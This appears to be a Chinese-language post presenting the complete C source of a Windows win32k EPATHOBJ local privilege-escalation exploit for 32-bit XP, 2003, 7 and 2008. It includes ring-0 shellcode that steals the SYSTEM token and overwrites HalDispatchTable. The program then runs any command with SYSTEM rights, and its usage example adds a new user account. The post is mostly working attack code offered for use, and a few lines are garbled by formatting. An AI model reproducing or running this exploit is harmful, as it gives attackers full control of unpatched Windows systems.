windows 32位 EPATHOBJ 提权 0day[影响xp/2003/win7/2008 (*32bit*)]

1. #include <stdio.h>
   
2. #include <STDARG.H>
   
3. #include <stddef.h>
   
4. #include <windows.h>
   
5. //#include <ntstatus.h>
   
6. 
   
7. #pragma comment(lib, "gdi32")
   
8. #pragma comment(lib, "kernel32")
   
9. #pragma comment(lib, "user32")
   
10. 
    
11. #define MAX_POLYPOINTS (8192 * 3)
    
12. #define MAX_REGIONS 8192
    
13. #define CYCLE_TIMEOUT 10000
    
14. 
    
15. #pragma comment(linker, "/SECTION:.text,ERW")
    
16. 
    
17. //
    
18. // win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
    
19. //
    
20. // Tavis Ormandy <taviso () cmpxchg8b com>, March 2013
    
21. //
    
22. 
    
23. POINT       Points[MAX_POLYPOINTS];
    
24. BYTE        PointTypes[MAX_POLYPOINTS];
    
25. HRGN        Regions[MAX_REGIONS];
    
26. ULONG       NumRegion = 0;
    
27. HANDLE      Mutex;
    
28. 
    
29. // Log levels.
    
30. typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
    
31. 
    
32. VOID LogInit();
    
33. VOID LogRelase();
    
34. BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
    
35. 
    
36. // Copied from winddi.h from the DDK
    
37. #define PD_BEGINSUBPATH   0x00000001
    
38. #define PD_ENDSUBPATH     0x00000002
    
39. #define PD_RESETSTYLE     0x00000004
    
40. #define PD_CLOSEFIGURE    0x00000008
    
41. #define PD_BEZIERS        0x00000010
    
42. 
    
43. #define ENABLE_SWITCH_DESKTOP  1
    
44. 
    
45. typedef struct  _POINTFIX
    
46. {
    
47.     ULONG x;
    
48.     ULONG y;
    
49. } POINTFIX, *PPOINTFIX;
    
50. 
    
51. // Approximated from reverse engineering.
    
52. typedef struct _PATHRECORD {
    
53.     struct _PATHRECORD *next;
    
54.     struct _PATHRECORD *prev;
    
55.     ULONG               flags;
    
56.     ULONG               count;
    
57.     POINTFIX            points[4];
    
58. } PATHRECORD, *PPATHRECORD;
    
59. 
    
60. PPATHRECORD PathRecord;
    
61. PATHRECORD  ExploitRecord = {0};
    
62. PPATHRECORD ExploitRecordExit;
    
63. 
    
64. typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    
65.     HANDLE Section;                 // Not filled in
    
66.     PVOID MappedBase;
    
67.     PVOID ImageBase;
    
68.     ULONG ImageSize;
    
69.     ULONG Flags;
    
70.     USHORT LoadOrderIndex;
    
71.     USHORT InitOrderIndex;
    
72.     USHORT LoadCount;
    
73.     USHORT OffsetToFileName;
    
74.     UCHAR  FullPathName[ 256 ];
    
75. } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
    
76. 
    
77. typedef struct _RTL_PROCESS_MODULES {
    
78.     ULONG NumberOfModules;
    
79.     RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
    
80. } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
    
81. 
    
82. typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
    
83. typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
    
84. typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
    
85. typedef ULONG ( __stdcall *NtFreeVirtualMemory_)( HANDLE, PVOID, PULONG, ULONG);
    
86. 
    
87. NtQueryIntervalProfile_  NtQueryIntervalProfile;
    
88. NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
    
89. NtQuerySystemInformation_ NtQuerySystemInformation;
    
90. NtFreeVirtualMemory_ NtFreeVirtualMemory;
    
91. ULONG    PsInitialSystemProcess, PsReferencePrimaryToken,
    
92.      PsGetThreadProcess, WriteToHalDispatchTable, FixAddress;
    
93. 
    
94. void _declspec(naked) ShellCode()
    
95. {
    
96.     __asm
    
97.     {
    
98.       pushad
    
99.       pushfd
    
100.       mov esi,PsReferencePrimaryToken
     
101. FindTokenOffset:
     
102.       lodsb
     
103.       cmp al, 8Dh;
     
104.       jnz FindTokenOffset
     
105.       mov edi,[esi+1]
     
106.       mov esi,PsInitialSystemProcess
     
107.       mov esi,[esi]
     
108.       push fs:[124h]
     
109.       mov eax,PsGetThreadProcess
     
110.       call eax
     
111.       add esi, edi
     
112.       push esi
     
113.       add edi, eax
     
114.       movsd
     
115.       
     
116.       ;add token ref count.
     
117.       pop esi
     
118.       mov esi, [esi]
     
119.       and esi, 0xFFFFFFF8
     
120.       lea eax, [esi-0x18]
     
121.       mov DWORD PTR [eax], 0x016B00B5
     
122.       ;fix the haltable
     
123.       mov eax, WriteToHalDispatchTable
     
124.       mov ecx, FixAddress
     
125.       mov [ecx], 0xC3
     
126.       mov DWORD PTR [eax], ecx
     
127. 
     
128.       popfd
     
129.       popad
     
130.       ;set ret code for NtQueryIntervalProfile
     
131.       mov eax, [esp+0xc]
     
132.       mov DWORD PTR [eax+4], 1
     
133.       mov DWORD PTR [eax+8], 0xC0000018
     
134.       xor eax, eax
     
135.       ret
     
136.     }
     
137. }
     
138. 
     
139. DWORD WINAPI WatchdogThread(LPVOID Parameter)
     
140. {
     
141.   //
     
142.     // This routine waits for a mutex object to timeout, then patches the
     
143.     // compromised linked list to point to an exploit. We need to do this.
     
144.     //
     
145. 
     
146.   LogMessage(L_INFO, "Watchdog thread %d waiting on Mutex", GetCurrentThreadId());
     
147.   
     
148.     if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
     
149.    
     
150.     //
     
151.         // It looks like the main thread is stuck in a call to FlattenPath(),
     
152.         // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
     
153.         // up, and then patch the list to trigger our exploit.
     
154.         //
     
155. 
     
156.     while (NumRegion--)
     
157.             DeleteObject(Regions[NumRegion]);
     
158.    
     
159.         LogMessage(L_ERROR, "InterlockedExchange(0x%08x, 0x%08x);", &PathRecord->next, &ExploitRecord);
     
160.    
     
161.         InterlockedExchange((PLONG)&PathRecord->next, (LONG)&ExploitRecord);
     
162.    
     
163.     } else {
     
164.         LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
     
165.     }
     
166.   
     
167.     return 0;
     
168. }
     
169. 
     
170. void wellcome()
     
171. {
     
172.   printf("\t\tthe win32k.sys EPATHOBJ 0day exploit\n");
     
173.   printf("***********************\n");
     
174. ********************************************
     
175.   printf("***\ttested system:xp/2003/win7/2008 (*32bit*)\t\t***\n");
     
176.   printf("*******************************************************************\n");
     
177. }
     
178. 
     
179. void usage()
     
180. {
     
181.   printf("\nusage:\n<app> <cmd> <parameter>\n");
     
182.   printf("example:\napp.exe net "user 111 111 /add"");
     
183. }
     
184. 
     
185. BOOL
     
186. FindAFixAddress(
     
187.   ULONG NtoskrnlBase)
     
188. {
     
189.   FixAddress = NtoskrnlBase + FIELD_OFFSET(IMAGE_DOS_HEADER, e_res2);
     
190.   LogMessage(L_INFO, "Get FixAddress --> 0x%08x", FixAddress);
     
191.   return TRUE;
     
192. 
     
193. }
     
194. 
     
195. // 0x602464FF; /*jmp esp+0x60*/
     
196. // 0x51C3686A; /*push 0; ret*/
     
197. DWORD CheckMagicDword()
     
198. {
     
199.   OSVERSIONINFOEX OSVer;
     
200.   DWORD dwMagic = 0;
     
201. 
     
202.     OSVer.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
     
203.     if(GetVersionEx((OSVERSIONINFO *)&OSVer)){
     
204.     switch(OSVer.dwMajorVersion){
     
205.     case 5:
     
206.       dwMagic = 0x602464FF;
     
207.       break;
     
208.     case 6:
     
209.       dwMagic = 0x642464FF;
     
210.       break;
     
211.     default:
     
212.       dwMagic = 0;
     
213.     }
     
214.   }
     
215.   return dwMagic;
     
216. }
     
217. 
     
218. 
     
219. int main(int argc, char **argv)
     
220. {
     
221.     HANDLE      Thread;
     
222.     HDC         Device;
     
223.     ULONG       Size;
     
224.     ULONG       PointNum;
     
225.   int nret = 0;
     
226.   
     
227.   DWORD MAGIC_DWORD = CheckMagicDword();
     
228.     ULONG AllocSize = 0x1000, status, NtoskrnlBase;
     
229.   RTL_PROCESS_MODULES  module;
     
230.   HMODULE ntoskrnl = NULL;
     
231.   DWORD dwFix;
     
232.   ULONG Address = MAGIC_DWORD & 0xFFFFF000;
     
233.   LONG ret;
     
234.   BOOL bRet = FALSE;
     
235. #ifdef ENABLE_SWITCH_DESKTOP
     
236.   HDESK hDesk;
     
237. #endif
     
238.     HMODULE  ntdll = GetModuleHandle( "ntdll.dll" );
     
239.   
     
240.   wellcome();
     
241. 
     
242.   if (argc < 2){
     
243.     usage();
     
244.     return -1;
     
245.   }
     
246. 
     
247.   if (!MAGIC_DWORD){
     
248.     LogMessage(L_ERROR, "unsupported system version\n");
     
249.     return -1;
     
250.   }
     
251. 
     
252.   LogInit();
     
253. 
     
254.   NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
     
255.     NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
     
256.     NtQuerySystemInformation  =  (NtQuerySystemInformation_)GetProcAddress( ntdll ,"NtQuerySystemInformation" );
     
257.   NtFreeVirtualMemory =  (NtFreeVirtualMemory_)GetProcAddress( ntdll ,"NtFreeVirtualMemory" );
     
258.     if ( !NtQueryIntervalProfile || !NtAllocateVirtualMemory ||
     
259.      !NtQuerySystemInformation || !NtFreeVirtualMemory){
     
260.     LogMessage(L_ERROR, "get function address error\n");
     
261.     LogRelase();
     
262.     return -1;
     
263.   }
     
264.   
     
265.   //
     
266.   // try to allocate memory.
     
267.   //
     
268. 
     
269.   while (TRUE){
     
270.     ret = NtAllocateVirtualMemory( (HANDLE)-1, &Address, 0, &AllocSize, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
     
271.     if(ret < 0){
     
272.       MEMORY_BASIC_INFORMATION meminfo;
     
273.       LogMessage(L_ERROR, "allocate memory error code 0x%08x", ret);
     
274.       LogMessage(L_INFO, "try to free memory");
     
275.       if(VirtualQuery((LPVOID)Address, &meminfo, sizeof(meminfo))){
     
276.         LogMessage(L_INFO, "meminfo state %d %d\n", meminfo.State, meminfo.Protect);
     
277.       }
     
278.       ret = NtFreeVirtualMemory((HANDLE)-1, &Address, &AllocSize, MEM_RELEASE);
     
279.       if (ret < 0){
     
280.         LogMessage(L_ERROR, "free memory error code 0x%08x", ret);
     
281.         LogRelase();
     
282.         return -1;
     
283.       }
     
284.     }else{
     
285.       break;
     
286.     }
     
287.   }
     
288.   
     
289.   //
     
290.   // get the kernel info
     
291.   //
     
292. 
     
293.     status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
     
294.     if ( status != 0xC0000004 ){
     
295.     LogMessage(L_ERROR, "NtQuerySystemInformation error code:0x%08x\n", status);
     
296.         LogRelase();
     
297.     return -1;
     
298.   }
     
299.   
     
300.     NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase;
     
301.   
     
302.     //
     
303.     // 把ntoskrnl.exe加载进来
     
304.     //
     
305.   
     
306.     ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
     
307.     if (ntoskrnl == NULL){
     
308.     LogMessage(L_ERROR, "LoadLibraryA error code:0x%08x\n", GetLastError());
     
309.         LogRelase();
     
310.     return -1;
     
311.   }
     
312.    
     
313.     //
     
314.     // 计算实际地址
     
315.     //
     
316.   
     
317.     WriteToHalDispatchTable =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4;
     
318.     PsInitialSystemProcess =  (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
     
319.     PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
     
320.     PsGetThreadProcess =  (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
     
321.   
     
322.   if(!FindAFixAddress(NtoskrnlBase)){
     
323.     LogMessage(L_ERROR, "Can not Find A Fix Address\n");
     
324.     nret = -1;
     
325.     goto __end;
     
326.   }
     
327. 
     
328.   //
     
329.     // Create our PATHRECORD in user space we will get added to the EPATHOBJ
     
330.     // pathrecord chain.
     
331.     //
     
332. 
     
333.   PathRecord = (PPATHRECORD)VirtualAlloc(NULL,
     
334.                               sizeof(PATHRECORD),
     
335.                               MEM_COMMIT | MEM_RESERVE,
     
336.                               PAGE_EXECUTE_READWRITE);
     
337. 
     
338.     LogMessage(L_INFO, "Alllocated userspace PATHRECORD () %p", PathRecord);
     
339.   
     
340.   //
     
341.     // Initialize with recognizable debugging values.
     
342.     //
     
343. 
     
344.   FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC);
     
345. 
     
346.     PathRecord->next    = PathRecord;
     
347.     PathRecord->prev    = (PPATHRECORD)(0x42424242);
     
348.   
     
349.   //
     
350.     // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
     
351.     // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
     
352.     // loop in EPATHOBJ::bFlatten().
     
353.     //
     
354. 
     
355.   PathRecord->flags   = 0;
     
356. 
     
357.     LogMessage(L_INFO, "  ->next  @ %p", PathRecord->next);
     
358.     LogMessage(L_INFO, "  ->prev  @ %p", PathRecord->prev);
     
359.     LogMessage(L_INFO, "  ->flags @ %u", PathRecord->flags);
     
360.   
     
361.   ExploitRecordExit = (PPATHRECORD)MAGIC_DWORD;
     
362.   ExploitRecordExit->next = NULL;
     
363.   ExploitRecordExit->next = NULL;
     
364.   ExploitRecordExit->flags = PD_BEGINSUBPATH;
     
365.   ExploitRecordExit->count = 0;
     
366.   
     
367. 
     
368.   ExploitRecord.next  = (PPATHRECORD)MAGIC_DWORD;
     
369.     ExploitRecord.prev  = (PPATHRECORD)WriteToHalDispatchTable;
     
370.     ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH;
     
371.   ExploitRecord.count = 4;
     
372.   
     
373.     LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4);
     
374.   
     
375.   //
     
376.     // Generate a large number of Belier Curves made up of pointers to our
     
377.     // PATHRECORD object.
     
378.     //
     
379. 
     
380.   for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
     
381.         Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
     
382.         Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
     
383.         PointTypes[PointNum]    = PT_BEZIERTO;
     
384.     }
     
385. 
     
386.   //
     
387.     // Switch to a dedicated desktop so we don't spam the visible desktop with
     
388.     // our Lines (Not required, just stops the screen from redrawing slowly).
     
389.     //
     
390. #ifdef ENABLE_SWITCH_DESKTOP
     
391.   hDesk = CreateDesktop( "DontPanic",
     
392.               NULL,
     
393.               NULL,
     
394.               0,
     
395.               GENERIC_ALL,
     
396.                NULL);
     
397.   if (hDesk){
     
398.     SetThreadDesktop(hDesk);
     
399.   }
     
400. #endif
     
401.   
     
402.   while (TRUE){
     
403. 
     
404.     BOOL bBreak = FALSE;
     
405. 
     
406.     Mutex = CreateMutex(NULL, TRUE, NULL);
     
407.     if (!Mutex){
     
408.       LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);
     
409.       nret = -1;
     
410.       goto __end;
     
411.     }
     
412.    
     
413.     //
     
414.     // Get a handle to this Desktop.
     
415.     //
     
416. 
     
417.     Device = GetDC(NULL);
     
418.    
     
419.     //
     
420.     // Spawn a thread to cleanup
     
421.     //
     
422. 
     
423.     Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);
     
424.    
     
425.     LogMessage(L_INFO, "start CreateRoundRectRgn");
     
426.    
     
427.     //
     
428.     // We need to cause a specific AllocObject() to fail to trigger the
     
429.     // exploitable condition. To do this, I create a large number of rounded
     
430.     // rectangular regions until they start failing. I don't think it matters
     
431.     // what you use to exhaust paged memory, there is probably a better way.
     
432.     //
     
433.     // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
     
434.     // failure. Seriously, do some damn QA Microsoft, wtf.
     
435.     //
     
436. 
     
437.     for (Size = 1 << 26; Size; Size >>= 1) {
     
438.       while (TRUE){
     
439.         HRGN hm = CreateRoundRectRgn(0, 0, 1, Size, 1, 1);
     
440.         if (!hm){
     
441.           break;
     
442.         }
     
443.         if (NumRegion < MAX_REGIONS){
     
444.           Regions[NumRegion] = hm;
     
445.           NumRegion++;
     
446.         }else{
     
447.           NumRegion = 0;
     
448.         }
     
449.       }
     
450.     }
     
451. 
     
452.     LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);
     
453. 
     
454.     LogMessage(L_INFO, "Flattening curves...");
     
455.    
     
456.     //
     
457.     // Begin filling the free list with our points.
     
458.     //
     
459.    
     
460.     dwFix = *(PULONG)ShellCode;
     
461. 
     
462.     for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
     
463.       BeginPath(Device);
     
464.       PolyDraw(Device, Points, PointTypes, PointNum);
     
465.       EndPath(Device);
     
466.       FlattenPath(Device);
     
467.       FlattenPath(Device);
     
468.       
     
469.       //
     
470.       // call the function to exploit.
     
471.       //
     
472. 
     
473.       ret = NtQueryIntervalProfile(2, (PULONG)ShellCode);
     
474.       
     
475.       //
     
476.       // we will set the status with 0xC0000018 in ring0 shellcode.
     
477.       //
     
478. 
     
479.       if (*(PULONG)ShellCode == 0xC0000018){
     
480.         bRet = TRUE;
     
481.         break;
     
482.       }
     
483.       
     
484.       //
     
485.       // fix
     
486.       //
     
487.       
     
488.       *(PULONG)ShellCode = dwFix;
     
489. 
     
490.       EndPath(Device);
     
491.     }
     
492.    
     
493.     if (bRet){
     
494.       LogMessage(L_INFO, "Exploit ok run command");
     
495.       ShellExecute( NULL, "open", argv[1], argc > 2 ? argv[2] : NULL, NULL, SW_SHOW);
     
496.       bBreak = TRUE;
     
497.     }else{
     
498.       LogMessage(L_INFO, "No luck, cleaning up. and try again..");
     
499.     }
     
500.    
     
501.     //
     
502.     // If we reach here, we didn't trigger the condition. Let the other thread know.
     
503.     //
     
504. 
     
505.     ReleaseMutex(Mutex);
     
506.    
     
507.     ReleaseDC(NULL, Device);
     
508.     WaitForSingleObject(Thread, INFINITE);
     
509. 
     
510.     if (bBreak){
     
511.       break;
     
512.     }
     
513. 
     
514.   }
     
515. __end:
     
516.   LogRelase();
     
517.   if (ntoskrnl)
     
518.     FreeLibrary(ntoskrnl);
     
519. #ifdef ENABLE_SWITCH_DESKTOP
     
520.   if (hDesk){
     
521.     CloseHandle(hDesk);
     
522.   }
     
523. #endif
     
524.     return nret;
     
525. }
     
526. 
     
527. CRITICAL_SECTION gCSection;
     
528. 
     
529. VOID LogInit()
     
530. {
     
531.   InitializeCriticalSection(&gCSection);
     
532. }
     
533. 
     
534. VOID LogRelase()
     
535. {
     
536.   DeleteCriticalSection(&gCSection);
     
537. }
     
538. 
     
539. //
     
540. // A quick logging routine for debug messages.
     
541. //
     
542. 
     
543. BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
     
544. {
     
545.     CHAR Buffer[1024] = {0};
     
546.     va_list Args;
     
547.   
     
548.   EnterCriticalSection(&gCSection);
     
549. 
     
550.     va_start(Args, Format);
     
551.     _snprintf(Buffer, sizeof(Buffer), Format, Args);
     
552.     va_end(Args);
     
553. 
     
554.     switch (Level) {
     
555.         case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break;
     
556.         case L_INFO:  fprintf(stdout, "[+] %s\n", Buffer); break;
     
557.         case L_WARN:  fprintf(stderr, "[*] %s\n", Buffer); break;
     
558.         case L_ERROR: fprintf(stderr, "[!] %s\n", Buffer); break;
     
559.     }
     
560.   
     
561.     fflush(stdout);
     
562.     fflush(stderr);
     
563.   
     
564.   LeaveCriticalSection(&gCSection);
     
565. 
     
566.     return TRUE;
     
567. }

复制代码

此漏洞在做压力测试的时候发现。